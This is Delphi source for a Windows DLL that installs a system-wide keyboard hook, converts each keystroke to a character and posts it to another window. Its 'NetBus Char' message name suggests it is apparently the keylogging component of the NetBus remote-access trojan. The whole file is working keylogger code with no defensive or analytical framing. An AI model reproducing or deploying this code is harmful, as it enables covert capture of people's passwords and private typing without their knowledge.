library KeyHook;

uses
  Windows,
//  ComServ,
  SysUtils,
  Classes;

{$R *.RES}

const
  Version : string = '1.10';

type
  PSharedData = ^TSharedData;
  TSharedData = record
    KbdHook : HHook;
    DestWnd : HWnd;
    CharMsg : Word;
    ShiftDown : Boolean;
    Key : Char;
    Listen : Boolean;
    Click : Boolean;
  end;

var
  MapHandle : THandle;
  Shared : PSharedData;

procedure FixKey(var Ch : Char; Shift : Boolean);
begin
  if not Shift then
    Exit;
  case Ch of
    '1' : Ch := '!';
    '2' : Ch := '"';
    '3' : Ch := '#';
    '4' : Ch := '';
    '5' : Ch := '%';
    '6' : Ch := '&';
    '7' : Ch := '/';
    '8' : Ch := '(';
    '9' : Ch := ')';
    '0' : Ch := '=';
    '+' : Ch := '?';
    '.' : Ch := ':';
    ',' : Ch := ';';
  end;
end;

function GetKey(Code : LongInt) : Char;
var
  I : Integer;
begin
  Result := #0;
  I := MapVirtualKey(Code, 2);
  if (I <> 0) and (I < $FF) then
    Result := Chr(Byte(I))
  else
    if ((Code >= $30) and (Code <= $39)) or
       ((Code >= $41) and (Code <= $5A)) then
     Result := Chr(Byte(Code))
{ else
    if ((Code >= $70) and (Code <= $87)) then
      Result := 'F' + IntToStr(Code-$6F)[1] }
  else //Numeric keypad
    if ((Code >= $60) and (Code <= $69)) then
      Result := IntToStr(Code-$60)[1]
  else
  case Code of
    VK_BACK : ; // Result := #8;
    VK_TAB : ;
    VK_RETURN : ;
    VK_SHIFT : ;
    VK_CAPITAL : ;
    VK_ESCAPE : ;
    VK_SPACE : ;
    VK_PRIOR : ;
    VK_NEXT : ;
    VK_END : ;
    VK_HOME : ;
    VK_LEFT : ;
    VK_UP : ;
    VK_RIGHT : ;
    VK_DOWN : ;
    VK_INSERT : ;
    VK_DELETE : ;
  end;
end;

procedure ProcessKey(Keycode, Flags : DWORD);
var
  CapsOn : Boolean;
  KeyDown : Boolean;
begin
  KeyDown := (Flags shr 31) and 1 = 0;
  Shared^.Key := GetKey(Keycode);
  with Shared^ do begin
    if KeyDown then begin
      CapsOn := Lo(GetKeyState(VK_CAPITAL)) = 1;
      if CapsOn xor ShiftDown then
        CharUpperBuff(@Key, 1)
      else CharLowerBuff(@Key, 1);
      FixKey(Key, ShiftDown);
      PostMessage(DestWnd, CharMsg, DWORD(Key), Keycode);
    end;
    if Keycode = VK_SHIFT then
      ShiftDown := KeyDown;
  end;
end;

procedure ProcessKey2(Keycode, Flags : DWORD);
begin
  with Shared^ do
    PostMessage(DestWnd, CharMsg, Keycode, Flags);
end;

function KeyboardProc(Code : Integer; wParam : WPARAM; lParam : LPARAM) : LRESULT; stdcall;
//var
//  T : TextFile;
begin
  Result := 0;
  try
    if Code < 0 then
      Result := CallNextHookEx(Shared^.KbdHook, Code, WParam, LParam);
  except
//    Application.HandleException(nil);
  end;
  if Code = HC_ACTION then begin
{ AssignFile(T, 'E:\TEMP.TXT');
Append(T);
Writeln(IntToStr(Shared^.DestWnd) + ',' + IntToStr(Byte(Shared^.Listen)) + ','+ IntToStr(Byte(Shared^.Click)));
CloseFile(T); }
    if Shared^.Listen then
      ProcessKey(wParam, lParam);
    if Shared^.Click and ((lParam shr 31) and 1 = 0) then // Key down
      MessageBeep(MB_OK);
  end;
end;

function LastChar : Char; stdcall;
begin
  Result := Shared^.Key;
end;

procedure SetKeyHook(Wnd : HWnd); stdcall;
var
  Temp : HHook;
begin
  if Shared^.KbdHook = 0 then begin
    Temp := SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, HInstance, 0);
    Shared^.KbdHook := Temp;
    Shared^.DestWnd := Wnd;
    Shared^.ShiftDown := False;
  end;
end;

procedure ClearKeyHook; stdcall;
begin
  UnhookWindowsHookEx(Shared^.KbdHook);
  Shared^.KbdHook := 0;
  Shared^.DestWnd := 0;
end;

procedure ReturnKeys(B : Boolean; Wnd : HWnd); stdcall;
begin
  SetKeyHook(Wnd);
  Shared^.Listen := B;
end;

procedure ClickOnKey(B : Boolean; Wnd : HWnd); stdcall;
begin
  SetKeyHook(Wnd);
  Shared^.Click := B;
end;

procedure DLLEntryPoint(dwReason : DWord);
var
  Init : Boolean;
begin
  case dwReason of
    DLL_PROCESS_ATTACH: begin
      MapHandle := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(TSharedData), 'MyKeyHook');
      Init := GetLastError <> ERROR_ALREADY_EXISTS;
      if MapHandle = 0 then begin
//       ShowMessage('Can''t Create Memory Map');
       Exit;
      end;
      Shared := MapViewOfFile(MapHandle, FILE_MAP_ALL_ACCESS, 0, 0, 0);
      if Shared = nil then begin
        CloseHandle(MapHandle);
//       ShowMessage('Can''t View Memory Map');
        Exit;
      end;
      if Init then begin
        FillChar(Shared^, SizeOf(TSharedData), #0);
        Shared^.CharMsg := RegisterWindowMessage('NetBus Char');
      end;
    end;
    DLL_PROCESS_DETACH: begin
      UnmapViewOfFile(Shared);
      CloseHandle(MapHandle);
    end;
    DLL_THREAD_ATTACH: ;
    DLL_THREAD_DETACH: ;
  end;
end;

procedure GetKeyVer(P : PChar); stdcall;
var
  Len : Word;
begin
  Len := Length(Version);
  StrMove(P, PChar(Version), Len);
  P[Len] := #0;
end;

exports
{ DllGetClassObject, DllCanUnloadNow, DllRegisterServer, DllUnregisterServer, }
  LastChar, KeyboardProc, SetKeyHook, ClearKeyHook, ReturnKeys,
  ClickOnKey, GetKeyVer;

begin
  DLLProc := @DLLEntryPoint;
  DLLEntryPoint(DLL_PROCESS_ATTACH);
end.
